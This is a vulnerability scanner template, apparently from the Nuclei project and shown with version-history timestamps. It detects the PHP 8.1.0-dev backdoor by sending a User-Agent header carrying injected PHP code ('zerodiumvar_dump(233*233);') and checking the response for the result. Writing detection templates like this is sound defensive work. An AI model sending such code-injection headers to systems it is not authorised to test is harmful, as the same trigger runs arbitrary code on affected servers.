2021-06-10 16:31:26 +00:00
|
|
|
id: php-zerodium-backdoor-rce
|
|
|
|
|
|
|
|
info:
|
2022-05-30 16:12:27 +00:00
|
|
|
name: PHP 8.1.0-dev - Backdoor Remote Code Execution
|
2021-06-10 16:31:26 +00:00
|
|
|
author: dhiyaneshDk
|
2021-09-18 14:07:47 +00:00
|
|
|
severity: critical
|
2022-05-30 16:12:27 +00:00
|
|
|
description: PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://news-web.php.net/php.internals/113838
|
2022-05-30 16:12:27 +00:00
|
|
|
- https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cve-id:
|
|
|
|
cwe-id: CWE-77
|
2021-06-10 16:31:26 +00:00
|
|
|
tags: php,backdoor
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}"
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2021-06-10 16:31:26 +00:00
|
|
|
headers:
|
2021-08-19 13:59:55 +00:00
|
|
|
User-Agent: zerodiumvar_dump(233*233);
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2021-06-10 16:31:26 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "int(54289)"
|
|
|
|
part: body
|
2022-05-30 16:12:27 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/30
|